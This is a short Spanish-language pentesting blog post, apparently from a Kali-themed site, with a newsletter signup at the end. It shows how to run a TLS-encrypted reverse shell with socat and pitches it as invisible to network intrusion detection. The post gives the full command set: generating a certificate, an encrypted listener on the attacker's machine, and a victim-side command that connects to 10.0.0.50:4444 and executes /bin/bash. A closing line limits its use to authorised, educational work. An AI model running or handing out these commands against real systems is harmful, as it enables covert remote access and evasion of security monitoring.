~ / blog / pentesting
KALI

Shells cifradas con socat

Una reverse shell normal viaja en texto plano; cualquier IDS de red la ve y la alerta.

socat te da shells totalmente cifradas con TLS, invisibles a la inspección de red. Generas un certificado, levantas el escucha cifrado en tu máquina, y en la víctima te conectas con socat apuntando a ti por TLS.

Bonus: socat también da shells con terminal completa de una, sin el ritual de estabilización. Es la navaja suiza de las conexiones para el pentester avanzado.

# los comandos

kali@kali:~$ openssl req -x509 -newkey rsa -keyout k.pem -out c.pem -days 1 -nodes && cat k.pem c.pem > s.pemcopiar
kali@kali:~$ socat OPENSSL-LISTEN:4444,cert=s.pem,verify=0 -copiar
(escucha cifrada)
www-data@victim:$ socat OPENSSL:10.0.0.50:4444,verify=0 EXEC:/bin/bash,pty,stderrcopiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.